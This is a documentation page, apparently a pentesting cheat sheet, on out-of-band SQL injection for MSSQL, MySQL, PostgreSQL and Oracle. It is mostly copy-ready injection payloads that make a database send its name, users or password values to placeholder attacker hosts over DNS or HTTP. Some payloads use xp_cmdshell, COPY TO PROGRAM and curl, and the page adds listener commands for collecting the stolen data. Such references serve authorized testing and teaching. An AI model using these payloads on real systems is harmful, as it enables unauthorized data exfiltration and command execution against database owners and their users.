> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Out-of-Band (OOB)

> Out-of-band SQL injection: exfiltrate data via DNS and HTTP requests when no in-band output is available.

## Overview

No visible output, no timing difference. Trigger the database to make an external request (DNS/HTTP) carrying extracted data. Requires: database can make outbound connections.

***

## MSSQL

### DNS Exfiltration

```
'; DECLARE @d varchar(1024); SET @d=(SELECT DB_NAME()); EXEC('master..xp_dirtree "\\'+@d+'.ATTACKER_DOMAIN\\x"')-- -
```

### HTTP via xp\_cmdshell

```
'; EXEC xp_cmdshell 'nslookup data.ATTACKER_DOMAIN'-- -
'; EXEC xp_cmdshell 'curl http://ATTACKER_IP/?data=test'-- -
```

### OLE Automation

```
'; DECLARE @o int; EXEC sp_OACreate 'MSXML2.XMLHTTP',@o OUT; EXEC sp_OAMethod @o,'open',NULL,'GET','http://ATTACKER_IP/?d='+DB_NAME(),false; EXEC sp_OAMethod @o,'send';-- -
```

***

## MySQL

### DNS via LOAD\_FILE (Windows Only)

```
' UNION SELECT LOAD_FILE(CONCAT('\\\\',database(),'.ATTACKER_DOMAIN\\x'))-- -
' UNION SELECT LOAD_FILE(CONCAT('\\\\',
  (SELECT password FROM users LIMIT 1),
  '.ATTACKER_DOMAIN\\x'))-- -
```

### INTO OUTFILE + HTTP

```
' UNION SELECT 'data' INTO OUTFILE '\\\\ATTACKER_IP\\share\\out.txt'-- -
```

***

## PostgreSQL

### COPY to Program

```
'; COPY (SELECT current_database()) TO PROGRAM 'curl http://ATTACKER_IP/?d=$(cat /dev/stdin)'-- -
```

### dblink

```
'; SELECT dblink_connect('host=ATTACKER_IP dbname='||current_database())-- -
```

### DNS via Extension

```
CREATE EXTENSION IF NOT EXISTS dblink;
SELECT dblink_connect('host='||current_database()||'.ATTACKER_DOMAIN user=x dbname=x');
```

***

## Oracle

### UTL\_HTTP

```
' UNION SELECT UTL_HTTP.REQUEST('http://ATTACKER_IP/?d='||(SELECT user FROM dual)) FROM dual-- -
```

### UTL\_INADDR (DNS)

```
' AND 1=UTL_INADDR.GET_HOST_ADDRESS((SELECT user FROM dual)||'.ATTACKER_DOMAIN')-- -
```

### HTTPURITYPE

```
' UNION SELECT HTTPURITYPE('http://ATTACKER_IP/?d='||(SELECT user FROM dual)).GETCLOB() FROM dual-- -
```

***

## Catch Requests

### DNS — Burp Collaborator

Use Burp Collaborator or interactsh:

```bash theme={"dark"}
interactsh-client
```

Subdomain: `data.BURP_COLLABORATOR_DOMAIN`

### HTTP — Simple Listener

```bash theme={"dark"}
python3 -m http.server 8000
nc -lvnp 80
```

***

## Interactsh

```bash theme={"dark"}
# Install
go install github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest

# Run
interactsh-client
# Gives you: abc123.interact.sh
```

Use `abc123.interact.sh` as ATTACKER\_DOMAIN in payloads.

***

## Quick Reference

| Database   | Technique                                    |
| ---------- | -------------------------------------------- |
| MSSQL      | `xp_dirtree '\\data.DOMAIN\\x'`              |
| MySQL      | `LOAD_FILE('\\\\data.DOMAIN\\x')` (Windows)  |
| PostgreSQL | `dblink_connect('host=data.DOMAIN')`         |
| Oracle     | `UTL_HTTP.REQUEST('http://ATTACKER/?d='...)` |

***

## Sources

* [PortSwigger — Out-of-Band SQL Injection](https://portswigger.net/web-security/sql-injection/blind)
* [PortSwigger — SQL Injection Cheat Sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet)
* [OWASP — SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
